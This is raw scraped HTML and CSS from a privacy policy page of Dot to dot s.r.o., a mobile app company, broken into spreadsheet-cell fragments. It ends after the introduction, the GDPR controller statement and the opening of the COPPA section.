.iHZvIS{box-sizing:border-box;}.eUfhTP{box-sizing:border-box;margin-left:0px;-webkit-flex:1;-ms-flex:1;flex:1;-webkit-order:1;-ms-flex-order:1;order:1;} @media screen and (min-width:32em){.eUfhTP{margin-left:0px;}} @media screen and (min-width:48em){.eUfhTP{margin-left:60px;}} @media screen and (min-width:64em){.eUfhTP{margin-left:110px;}} @media screen and (min-width:32em){.eUfhTP{-webkit-order:1;-ms-flex-order:1;order:1;}} @media screen and (min-width:48em){.eUfhTP{-webkit-order:0;-ms-flex-order:0;order:0;}}.eqpWjl{box-sizing:border-box;width:83.33333333333334%;-webkit-order:0;-ms-flex-order:0;order:0;} @media screen and (min-width:32em){.eqpWjl{width:71.42857142857143%;}} @media screen and (min-width:48em){.eqpWjl{width:auto;}} @media screen and (min-width:32em){.eqpWjl{-webkit-order:0;-ms-flex-order:0;order:0;}} @media screen and (min-width:48em){.eqpWjl{-webkit-order:1;-ms-flex-order:1;order:1;}}.ctCbqZ{box-sizing:border-box;width:100%;} @media screen and (min-width:32em){.ctCbqZ{width:100%;}} @media screen and (min-width:48em){.ctCbqZ{width:50%;}}.kYmYWE{box-sizing:border-box;-webkit-flex:1;-ms-flex:1;flex:1;}.kMCagF{box-sizing:border-box;margin:50px auto 20px;} @media screen and (min-width:32em){.kMCagF{margin:40px 20px 0 0;}} @media screen and (min-width:48em){.kMCagF{margin:40px 20px 0</t>
  </si>
  <si>
    <t>0;}}.bOEeyR{box-sizing:border-box;margin:0 auto;} @media screen and (min-width:32em){.bOEeyR{margin:40px 0 0 0;}} @media screen and (min-width:48em){.bOEeyR{margin:40px 0 0 0;}}.ktadu{box-sizing:border-box;width:100%;padding-top:0px;-webkit-order:1;-ms-flex-order:1;order:1;-webkit-align-self:auto;-ms-flex-item-align:auto;align-self:auto;} @media screen and (min-width:32em){.ktadu{width:62.5%;}} @media screen and (min-width:48em){.ktadu{width:43.47826086956522%;}} @media screen and (min-width:32em){.ktadu{padding-top:0px;}} @media screen and (min-width:48em){.ktadu{padding-top:80px;}} @media screen and (min-width:32em){.ktadu{-webkit-order:1;-ms-flex-order:1;order:1;}} @media screen and (min-width:48em){.ktadu{-webkit-order:0;-ms-flex-order:0;order:0;}} @media screen and (min-width:32em){.ktadu{-webkit-align-self:auto;-ms-flex-item-align:auto;align-self:auto;}} @media screen and (min-width:48em){.ktadu{-webkit-align-self:flex-end;-ms-flex-item-align:end;align-self:flex-end;}}.ioGvUg{box-sizing:border-box;width:100%;margin-bottom:40px;padding-bottom:0px;padding-top:70px;} @media screen and (min-width:32em){.ioGvUg{width:100%;}} @media screen and (min-width:48em){.ioGvUg{width:45.45454545454545%;}} @media screen and (min-width:32em){.ioGvUg{margin-bottom:40px;padding-bottom:0px;padding-top:80px;}} @media screen and (min-width:48em){.ioGvUg{margin-bottom:0px;padding-bottom:50px;padding-top:50px;}}.eqgzfJ{box-sizing:border-box;width:100%;padding-top:0px;-webkit-align-self:auto;-ms-flex-item-align:auto;align-self:auto;} @media screen and (min-width:32em){.eqgzfJ{width:62.5%;}} @media screen and (min-width:48em){.eqgzfJ{width:43.47826086956522%;}} @media screen and (min-width:32em){.eqgzfJ{padding-top:0px;}} @media screen and (min-width:48em){.eqgzfJ{padding-top:90px;}} @media screen and (min-width:32em){.eqgzfJ{-webkit-align-self:auto;-ms-flex-item-align:auto;align-self:auto;}} @media screen and (min-width:48em){.eqgzfJ{-webkit-align-self:flex-end;-ms-flex-item-align:end;align-self:flex-end;}}.ihWdar{box-sizing:border-box;padding-top:80px;padding-bottom:80px;} @media screen and (min-width:32em){.ihWdar{padding-top:120px;padding-bottom:120px;}} @media screen and (min-width:48em){.ihWdar{padding-top:140px;padding-bottom:140px;}}.cTvBZC{box-sizing:border-box;margin:40px auto 20px;} @media screen and (min-width:32em){.cTvBZC{margin:40px 10px 0;}}.cfccgO{box-sizing:border-box;margin:0 auto;} @media screen and (min-width:32em){.cfccgO{margin:40px 10px 0;}}
/* sc-component-id: sc-bwzfXH */
.hKiLMS{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}.hFUbDu{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}.goOGKE{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;} @media screen and (min-width:32em){.goOGKE{-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}} @media screen and (min-width:48em){.goOGKE{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}}.lmDNkI{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;} @media screen and (min-width:32em){.lmDNkI{-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}} @media screen and (min-width:48em){.lmDNkI{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}} @media screen and (min-width:32em){.lmDNkI{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}} @media screen and (min-width:48em){.lmDNkI{-webkit-box-pack:left;-webkit-justify-content:left;-ms-flex-pack:left;justify-content:left;}}.boZRIf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;} @media screen and (min-width:32em){.boZRIf{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}} @media screen and (min-width:48em){.boZRIf{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}} @media screen and (min-width:32em){.boZRIf{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}} @media screen and (min-width:48em){.boZRIf{-webkit-box-pack:left;-webkit-justify-content:left;-ms-flex-pack:left;justify-content:left;}}.bUtYML{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;} @media screen and (min-width:32em){.bUtYML{-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}} @media screen and (min-width:48em){.bUtYML{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}} @media screen and (min-width:32em){.bUtYML{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}} @media screen and (min-width:48em){.bUtYML{-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;}}.dYKyrI{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;} @media screen and (min-width:32em){.dYKyrI{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}} @media screen and (min-width:48em){.dYKyrI{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;}}
/* sc-component-id: sc-1tdf11n-0 */
.hYsvRW{max-width:980px;margin:0 auto;padding-left:20px;padding-right:20px;z-index:1;position:relative;text-align:center;} @media screen and (min-width:32em){.hYsvRW{text-align:center;}} @media screen and (min-width:48em){.hYsvRW{text-align:left;}} @media (min-width:48em){.hYsvRW{padding-left:50px;padding-right:50px;}}.fwujKP{max-width:980px;margin:0 auto;padding-left:20px;padding-right:20px;z-index:1;position:relative;} @media (min-width:48em){.fwujKP{padding-left:50px;padding-right:50px;}}.kpjRbL{max-width:1300px;margin:0 auto;padding-left:20px;padding-right:20px;z-index:1;position:relative;} @media (min-width:48em){.kpjRbL{padding-left:50px;padding-right:50px;}}
/* sc-component-id: sc-1qi6n68-0 */
.ctbUxZ{background-color:#655540;height:100vh;min-height:500px;text-align:center;position:relative;} .ctbUxZ:after,.ctbUxZ:before{content:'';position:absolute;left:0;top:0;width:100%;height:100%;opacity:0;-webkit-transition:opacity 0.3s ease;transition:opacity 0.3s ease;} .ctbUxZ:after{background-image:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMTQ0MCIgaGVpZ2h0PSI0NyIgdmlld0JveD0iMCAwIDE0NDAgNDciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgPGcgZmlsbC1ydWxlPSJub256ZXJvIiBmaWxsPSJub25lIj4KICAgIDxwYXRoIGQ9Ik0xMTc3LjIxMyAxMS41OWMuMDkzLjMzNy05OC4yNDIgOC45MDMtMjk1LjAwMyAyNS42OTYuMDA0LS4wOTQuMDA2LS4xOS4wMDYtLjI4NSAwLTMuNDMyLTIuNzgzLTYuMjE1LTYuMjE2LTYuMjE1LTMuNDMzIDAtNi4yMTYgMi43ODMtNi4yMTYgNi4yMTYgMCAuMDk1LjAwMi4xOS4wMDYuMjhMNzI2LjU1IDEyLjgwNWMuNDI2LS44NDIuNjY2LTEuNzk1LjY2Ni0yLjgwMyAwLTMuNDMyLTIuNzgzLTYuMjE1LTYuMjE2LTYuMjE1LTMuNDMzIDAtNi4yMTYgMi43ODMtNi4yMTYgNi4yMTYgMCAuNDEuMDQuODEuMTE1IDEuMkw1NzguMTMgMzUuOTgzYy0uNDg1LTIuOTUtMy4wNDYtNS4yLTYuMTMzLTUuMi0zLjQzNCAwLTYuMjE3IDIuNzg0LTYuMjE3IDYuMjE3IDAgLjMwNS4wMjIuNjA1LjA2NC45TDI2NS45MzIgMTEuODZjLjE4NS0uNTg4LjI4NC0xLjIxMy4yODQtMS44NjIgMC0zLjQzMy0yLjc4My02LjIxNi02LjIxNi02LjIxNi0zLjQzMyAwLTYuMjE2IDIuNzgzLTYuMjE2IDYuMjE2IDAgLjM4NC4wMzUuNzYuMSAxLjEyNEw3LjAwNyAzNy4yNThDNS45NzMgMzMuMTQ4IDMuNjM3IDMwLjk5IDAgMzAuNzg1VjQ3aDE0NDBWMzAuNzgyYy00LjI4OC4wMDItNi40MzIgMi4xODItNi40MzIgNi41NEwxMTg4LjgxIDExLjUwN2MuMTI0LS40OC4xOS0uOTg2LjE5LTEuNTA3IDAtMy4zMTQtMi42ODYtNi02LTZzLTYgMi42ODYtNiA2YzAgLjU1LjA3NCAxLjA4NC4yMTMgMS41OXoiIGZpbGw9IiNGRkYiLz4KICAgIDxwYXRoIGQ9Ik0yNjAgMjBjLTUuNTIzIDAtMTAtNC40NzctMTAtMTBzNC40NzctMTAgMTAtMTAgMTAgNC40NzcgMTAgMTAtNC40NzcgMTAtMTAgMTB6TTAgNDdWMjdjNS41MjMgMCAxMCA0LjQ3NyAxMCAxMFM1LjUyMyA0NyAwIDQ3em0wLTRjMy4zMTQgMCA2LTIuNjg2IDYtNnMtMi42ODYtNi02LTZ2MTJ6bTE0NDAgNGMtNS41MjMgMC0xMC01LTEwLTEwczQuNDc3LTEwIDEwLTEwdjIwem0wLTRWMzFjLTMuMzE0IDAtNiAyLjY4Ni02IDZzMi42ODYgNiA2IDZ6TTI2MCAxNmMzLjMxNCAwIDYtMi42ODYgNi02cy0yLjY4Ni02LTYtNi02IDIuNjg2LTYgNiAyLjY4NiA2IDYgNnptMzEyIDMxYy01LjUyMyAwLTEwLTQuNDc3LTEwLTEwczQuNDc3LTEwIDEwLTEwIDEwIDQuNDc3IDEwIDEwLTQuNDc3IDEwLTEwIDEwem0wLTRjMy4zMTQgMCA2LTIuNjg2IDYtNnMtMi42ODYtNi02LTYtNiAyLjY4Ni02IDYgMi42ODYgNiA2IDZ6bTE0OS0yM2MtNS41MjMgMC0xMC00LjQ3Ny0xMC0xMHM0LjQ3Ny0xMCAxMC0xMCAxMCA0LjQ3NyAxMCAxMC00LjQ3NyAxMC0xMCAxMHptMC00YzMuMzE0IDAgNi0yLjY4NiA2LTZzLTIuNjg2LTYtNi02LTYgMi42ODYtNiA2IDIuNjg2IDYgNiA2em0xNTUgMzFjLTUuNTIzIDAtMTAtNC40NzctMTAtMTBzNC40NzctMTAgMTAtMTAgMTAgNC40NzcgMTAgMTAtNC40NzcgMTAtMTAgMTB6bTAtNGMzLjMxNCAwIDYtMi42ODYgNi02cy0yLjY4Ni02LTYtNi02IDIuNjg2LTYgNiAyLjY4NiA2IDYgNnptMzA3LTIzYy01LjUyMyAwLTEwLTQuNDc3LTEwLTEwczQuNDc3LTEwIDEwLTEwIDEwIDQuNDc3IDEwIDEwLTQuNDc3IDEwLTEwIDEwem0wLTRjMy4zMTQgMCA2LTIuNjg2IDYtNnMtMi42ODYtNi02LTYtNiAyLjY4Ni02IDYgMi42ODYgNiA2IDZ6IiBmaWxsPSIjRjRCM0E1Ii8+CiAgPC9nPgo8L3N2Zz4=);background-position:bottom center;background-repeat:repeat-x;opacity:1;} @media (min-width:48em){.ctbUxZ{text-align:left;}} .ctbUxZ .sc-1tdf11n-0{min-height:100%;}
/* sc-component-id: sc-1qi6n68-1 */
.blMJYy{position:absolute;width:1px;height:1px;opacity:0;}
/* sc-component-id: sc-1e9cz5y-0 */
.jqPWXW{padding-bottom:40px;padding-top:20px;} @media screen and (min-width:32em){.jqPWXW{padding-bottom:60px;padding-top:40px;}} @media screen and (min-width:48em){.jqPWXW{padding-bottom:90px;padding-top:60px;}}.bWJXQd{text-align:center;} @media screen and (min-width:32em){.bWJXQd{text-align:center;}} @media screen and (min-width:48em){.bWJXQd{text-align:left;}}.joJHnh{text-align:center;background:#F45E3E;} @media screen and (min-width:32em){.joJHnh{text-align:center;}} @media screen and (min-width:48em){.joJHnh{text-align:left;}}.bGJXLQ{text-align:center;background:url(/static/light-background.jpg) no-repeat;background-size:cover;background-position:center center;}
/* sc-component-id: kd3jm1-0 */
.TeYrg{position:relative;}
/* sc-component-id: sc-1truryc-0 */
.jRZCWw{background:#655540;padding:50px 40px;} @media (min-width:48em){.jRZCWw{padding:90px 50px;}} @media (min-width:64em){.jRZCWw{padding:90px 200px 90px 50px;}}
/* sc-component-id: sc-19yj7sp-0 */
.bZxfvJ{z-index:1;position:absolute;left:34px;top:34px;} @media (min-width:48em){.bZxfvJ{top:50px;left:50px;}}
/* sc-component-id: sc-1jufvrz-0 */
.gKGcHl{display:none;} @media (min-width:48em){.gKGcHl{display:block;}}
/* sc-component-id: sc-1yunlyb-0 */
.cqHEmi{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;margin:0 auto;padding:0;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}
/* sc-component-id: sc-1yunlyb-1 */
.iYcFZk{list-style:none;width:calc(100% / 3);text-align:center;margin:0 10px;}
/* sc-component-id: sc-1yunlyb-2 */
.gVfJKD{display:block;padding:5px;-webkit-transition:opacity .2s ease;transition:opacity .2s ease;} .gVfJKD:hover{opacity:0.6;}
/* sc-component-id: sc-1yunlyb-3 */
.gBJRGs{display:none;}
/* sc-component-id: sc-18bquyt-0 */
.iqGwDQ{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0;margin:0;} @media (min-width:48em){.iqGwDQ{-webkit-box-pack:left;-webkit-justify-content:left;-ms-flex-pack:left;justify-content:left;}}
/* sc-component-id: sc-18bquyt-1 */
.dYyVFs{list-style:</t>
  </si>
  <si>
    <t>none;padding:0 10px;margin:0 5px;} @media (min-width:48em){.dYyVFs:first-of-type{margin-left:0;padding-left:0;}}
/* sc-component-id: sc-18bquyt-2 */
.fDcQSg{color:inherit;-webkit-transition:0.2s ease;transition:0.2s ease;-webkit-text-decoration:none;text-decoration:none;} .fDcQSg:hover{color:#fff;}
/* sc-component-id: sc-18bquyt-3 */
.fMlDZe{white-space:pre-line;padding:62px 0 78px;font-size:1.6rem;} .fMlDZe a{color:#fff;} .fMlDZe</t>
  </si>
  <si>
    <t>a:hover{-webkit-text-decoration:underline;text-decoration:underline;} @media (min-width:48em){.fMlDZe{-webkit-order:1;-ms-flex-order:1;order:1;padding:10px 0 0 0;white-space:normal;}}
/* sc-component-id: sc-18bquyt-4 */
.kEbXjd{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;text-align:center;color:#F4B3A5;} @media (min-width:48em){.kEbXjd{text-align:left;}}
/* sc-component-id: sc-1ph5nv3-0 */
.cWLNqs{display:block;}
/* sc-component-id: sc-1ph5nv3-1 */
.eVIXfo{padding:150px 0 120px;background:url(/static/cover@2x.jpg) no-repeat;background-size:cover;background-position:center center;text-align:center;} @media (min-width:48em){.eVIXfo{padding:180px 0;text-align:left;}} @media (min-width:64em){.eVIXfo{padding:214px 0;}}
/* sc-component-id: sc-1lfsmfb-0 */
.klltvo{margin-right:14px;} .klltvo path{-webkit-transition:0.2s ease;transition:0.2s ease;}
/* sc-component-id: bphlwt-0 */
.frXiGb{border-radius:30px;font-size:1.6rem;-webkit-text-decoration:none;text-decoration:none;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:55px;width:200px;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-transition:0.2s ease;transition:0.2s ease;background:transparent;color:#fff;border:2px solid #fff;} .frXiGb :hover{background:#fff;color:#F45E3E;} .frXiGb:hover function StyledComponent(){classCallCheck(this,StyledComponent);return:possibleConstructorReturn(this,_ParentComponent.apply(this,arguments));} .frXiGb:hover path{fill:#F45E3E;}.hPRoey{border-radius:30px;font-size:1.6rem;-webkit-text-decoration:none;text-decoration:none;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:55px;width:200px;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-transition:0.2s ease;transition:0.2s ease;background:#F45E3E;color:#fff;border:2px solid #F45E3E;} .hPRoey:hover{background:#fff;color:#F45E3E;} .hPRoey:hover function StyledComponent(){classCallCheck(this,StyledComponent);return:possibleConstructorReturn(this,_ParentComponent.apply(this,arguments));} .hPRoey:hover path{fill:#F45E3E;}
/* sc-component-id: sc-global-2423361302 */
html,body{height:100%;width:100%;} html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscaled;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;text-size-adjust:100%;text-rendering:optimizeLegibility;font-size:62.5%;} body{font-family:Roboto,sans-serif;font-size:1.4rem;padding:0;} @media (min-width:48em){body{font-size:1.6rem;}} #__next{min-height:100%;width:100%;position:relative;} h1,h2,h3,h4{margin:0;padding:0;} p,label{margin:0;line-height:2;} input,button{font-family:Roboto,sans-serif;} input{display:block;} .smartbanner-show{margin-top:80px;} .smartbanner-show .smartbanner{display:block;} .smartbanner{position:</t>
  </si>
  <si>
    <t>fixed;left:0;top:0;display:none;width:100%;height:80px;line-height:80px;font-family:Helvetica Neue,sans-serif;background:#f4f4f4;z-index:9998;-webkit-font-smoothing:antialiased;overflow:hidden;-webkit-text-size-adjust:none;} .smartbanner-container{margin:0 auto;padding:0 5px;} .smartbanner-close{display:inline-block;vertical-align:middle;margin:0 5px 0 0;font-family:ArialRoundedMTBold,Arial;font-size:20px;text-align:center;color:#888;-webkit-text-decoration:none;text-decoration:none;border:0;border-radius:14px;-webkit-font-smoothing:subpixel-antialiased;} .smartbanner-close:active,.smartbanner-close:hover{color:#aaa;} .smartbanner-icon{width:57px;height:57px;margin-right:12px;background-size:cover;border-radius:10px;} .smartbanner-icon,.smartbanner-info{display:inline-block;vertical-align:middle;} .smartbanner-info{white-space:normal;width:calc(99% - 5px - 17px - 12px - 57px - 110px);font-size:11px;line-height:1.2em;font-weight:700;} .smartbanner-wrapper{max-width:110px;display:inline-block;text-align:right;width:100%;} .smartbanner-title{font-size:13px;line-height:18px;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;} .smartbanner-description{max-height:40px;overflow:hidden;} .smartbanner-author{text-overflow:ellipsis;white-space:nowrap;overflow:hidden;} .smartbanner-author:empty + .smartbanner-description{max-height:50px;} .smartbanner-button{margin:auto 0;height:24px;font-size:14px;line-height:24px;text-align:center;font-weight:700;color:#6a6a6a;text-transform:uppercase;-webkit-text-decoration:none;text-decoration:none;display:inline-block;text-shadow:0 1px 0 hsla(0,0%,100%,0.8);} .smartbanner-button:active,.smartbanner-button:hover{color:#aaa;} .smartbanner-android,.smartbanner-ios{background:#f2f2f2;box-shadow:0 1px 1px rgba(0,0,0,0.2);line-height:80px;} .smartbanner-android .smartbanner-close,.smartbanner-ios .smartbanner-close{border:0;width:18px;height:18px;line-height:18px;font-family:Arial;color:#888;text-shadow:0 1px 0 #fff;box-shadow:none;background:none;-webkit-font-smoothing:none;} .smartbanner-android .smartbanner-close:active,.smartbanner-android .smartbanner-close:hover .smartbanner-ios .smartbanner-close:active,.smartbanner-ios .smartbanner-close:hover{color:#888;} .smartbanner-android .smartbanner-icon,.smartbanner-ios .smartbanner-icon{background-size:cover;} .smartbanner-android .smartbanner-info,.smartbanner-ios .smartbanner-info{color:#6a6a6a;text-shadow:0 1px 0 hsla(0,0%,100%,0.8);font-weight:300;} .smartbanner-android .smartbanner-title,.smartbanner-ios .smartbanner-title{color:#4d4d4d;font-weight:500;} .smartbanner-android .smartbanner-button,.smartbanner-ios .smartbanner-button{padding:0 10px;font-size:15px;min-width:10%;font-weight:400;color:#0c71fd;box-shadow:none;} .smartbanner-android .smartbanner-button-text{text-align:center;display:block;padding:0 10px;background:none;text-transform:none;text-shadow:none;box-shadow:none;} .smartbanner-android .smartbanner-button-text:active,.smartbanner-android .smartbanner-button-text:hover{background:none;} .smartbanner-android .smartbanner-button:active,.smartbanner-android .smartbanner-button:hover,.smartbanner-ios .smartbanner-button:active,.smartbanner-ios .smartbanner-button:hover{background:#f2f2f2;} .smartbanner-kindle,.smartbanner-windows{display:none;}
/* sc-component-id: sc-1vn872h-0 */
.ewSLIB{width:100%;}&lt;/style&gt;&lt;script&gt;
              window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
              ga('create', 'UA-86532106-3', 'auto');
              ga('send', 'pageview');
            &lt;/script&gt;&lt;script async="" src="https://www.google-analytics.com/analytics.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;div&gt;&lt;div id="__next"&gt;&lt;div data-reactroot=""&gt;&lt;div class="kd3jm1-0</t>
  </si>
  <si>
    <t>TeYrg"&gt;&lt;div&gt;&lt;/div&gt;&lt;a class="sc-19yj7sp-0 bZxfvJ" href="/"&gt;&lt;svg width="69" height="70" viewBox="0 0 70 69" xmlns="http://www.w3.org/2000/svg"&gt;&lt;g fill="none" fill-rule="evenodd"&gt;&lt;path stroke="#fff" stroke-width="1.186" d="M67.4 68.417H1.525V1.874H67.4V25.3l-8.438 9.807 8.44 9.756z"&gt;&lt;/path&gt;&lt;path d="M68.95 2.056c0 .864-.693 1.563-1.548 1.563-.856 0-1.55-.7-1.55-1.564 0-.865.694-1.564 1.55-1.564.855 0 1.548.7 1.548 1.564zm-65.853 0c0 .864-.693</t>
  </si>
  <si>
    <t>1.563-1.55 1.563C.694 3.62 0 2.92 0 2.055 0 1.19.693.492 1.548.492c.856 0 1.55.7 1.55 1.564zM68.95 25.308c0 .864-.693 1.564-1.548 1.564-.856 0-1.55-.7-1.55-1.564 0-.864.694-1.564 1.55-1.564.855 0 1.548.7 1.548 1.564zm0 19.376c0 .865-.693 1.564-1.548 1.564-.856 0-1.55-.7-1.55-1.564 0-.864.694-1.563 1.55-1.563.855 0 1.548.7 1.548 1.564zm0 23.7c0</t>
  </si>
  <si>
    <t>.865-.693 1.565-1.548 1.565-.856 0-1.55-.7-1.55-1.565 0-.864.694-1.564 1.55-1.564.855 0 1.548.7 1.548 1.565zm-65.853 0c0 .865-.693</t>
  </si>
  <si>
    <t>1.565-1.55 1.565-.854 0-1.547-.7-1.547-1.565 0-.864.693-1.564 1.548-1.564.856 0 1.55.7 1.55 1.565zM60.52 34.938c0 .864-.693 1.564-1.548 1.564-.855 0-1.548-.7-1.548-1.563 0-.864.693-1.564 1.548-1.564.855 0 1.548.7 1.548 1.564zM18.452 16.553c0 1.825-1.224 3.393-3.16 3.393h-1.536V13.16h1.537c1.935 0</t>
  </si>
  <si>
    <t>3.16 1.553 3.16 3.393zm1.736 0c0 2.904-2.02 5.03-4.924 5.03H12.05v-10.06h3.214c2.903 0 4.924 2.126 4.924 5.03zm31.765-3.392H48.02v-1.637h9.573v1.638H53.66v8.423h-1.707V13.16zM15.265 31.69h-3.932v-1.638h9.572v1.638h-3.933v8.423h-1.707V31.69zM34.43 11.242c2.905 0 5.26 2.378 5.26 5.31 0 2.934-2.355 5.313-5.26 5.313-2.903 0-5.257-2.38-5.257-5.312 0-2.933 2.354-5.31 5.257-5.31zm0 8.9c-1.962 0-3.553-1.607-3.553-3.59 0-1.98 1.59-3.59 3.553-3.59 1.964 0 3.555 1.61 3.555 3.59 0 1.983-1.59 3.59-3.555 3.59zm0 9.63c2.905 0 5.26 2.377 5.26 5.31s-2.355 5.312-5.26 5.312c-2.903 0-5.257-2.38-5.257-5.31 0-2.935 2.354-5.313 5.257-5.313zm0 8.9c-1.962 0-3.553-1.607-3.553-3.59 0-1.982 1.59-3.59 3.553-3.59 1.964 0 3.555 1.608 3.555 3.59 0 1.983-1.59 3.59-3.555 3.59zM20.027 53.774c0 2.904-2.02 5.03-4.923 5.03h-3.216v-10.06h3.216c2.903 0 4.923 2.127 4.923 5.03zm-1.735 0c0 1.826-1.225 3.393-3.16 3.393h-1.536v-6.785h1.536c1.935 0 3.16 1.553 3.16 3.392zm33.5-3.392H47.86v-1.638h9.572v1.638H53.5v8.423H51.79v-8.423zm-17.362-1.92c2.905 0 5.26 2.38 5.26 5.313 0 2.932-2.355 5.31-5.26 5.31-2.903 0-5.257-2.378-5.257-5.31 0-2.934 2.354-5.312 5.257-5.312zm0 8.902c-1.962 0 -3.553-1.607-3.553-3.59 0-1.982 1.59-3.59 3.553-3.59 1.964 0 3.555 1.608 3.555 3.59 0 1.983-1.59 3.59-3.555 3.59" fill="#fff"&gt;&lt;/path&gt;&lt;/g&gt;&lt;/svg&gt;&lt;/a&gt;&lt;div&gt;&lt;header class="sc-1ph5nv3-1 eVIXfo"&gt;&lt;div class="sc-1ph5nv3-0 cWLNqs sc-1tdf11n-0 hYsvRW sc-bwzfXH hKiLMS sc-bdVaJa iHZvIS sc-bdVaJa iHZvIS" textAlign="center,center,left" type="sm"&gt;&lt;h1 class="md6ux4-0 gHlKi"&gt;Privacy Policy&lt;/h1&gt;&lt;/div&gt;&lt;/header&gt;&lt;section class="sc-1e9cz5y-0 jqPWXW"&gt;&lt;div class="sc-1tdf11n-0 fwujKP sc-bwzfXH hFUbDu sc-bdVaJa iHZvIS sc-bdVaJa iHZvIS"</t>
  </si>
  <si>
    <t>type="sm"&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;Dot to dot s.r.o Privacy Policy&lt;/h2&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;I. INTRODUCTION&lt;/h2&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;Dot to dot s.r.o. (“we,” “us” or “our”) takes privacy seriously. This Privacy policy explains our data protection policy and describes the types of information we may process when you use one or more of our mobile applications (the “App”, “our App”) and explains how we and some of the companies cooperate processing the information.&lt;br/&gt;When we refer to personal data (or personal information) we mean any information of any kind related to an identified or identifiable natural person.&lt;br/&gt;It is a natural person who can be identified directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his or her physical, physiological, mental, economic, cultural or social status.&lt;br/&gt;Our Privacy policy applies to all users, and others who access the App (“Users”).</t>
  </si>
  <si>
    <t>If you do not want us to collect, store, use or share your information in the ways described in this Privacy Policy, you should not play our apps or use our services.&lt;br/&gt;For the purposes of the GDPR, we are the data controller.&lt;/p&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;&lt;b&gt;PLEASE READ THE FOLLOWING PRIVACY POLICY, FOR INFORMATION REGARDING THE WAYS YOUR PERSONAL INFORMATION MAY BE PROCESSED, CAREFULLY. WHEN YOU USE THE APP, YOU ACKNOWLEDGE THAT YOU HAVE READ, UNDERSTOOD, AND AGREE TO BE BOUND BY THESE TERMS. BY ACCESSING OR USING THE APP, YOU AGREE TO PROCESSING OF YOUR PERSONAL DATA WHICH IS PROVIDED TO US IN LINE WITH THE TERMS OF THIS PRIVACY</t>
  </si>
  <si>
    <t>POLICY.&lt;/b&gt;&lt;/p&gt;&lt;h2 class="md6ux4-3 hUZglJ"&gt;II. COPPA&lt;/h2&gt;&lt;p class="sc-1eluo13-0 exEkaP"&gt;We comply with the Children’s Online Privacy Protection Act. We do not knowingly collect personal information on children under the age of 13.</t>
  </si>
  <si>
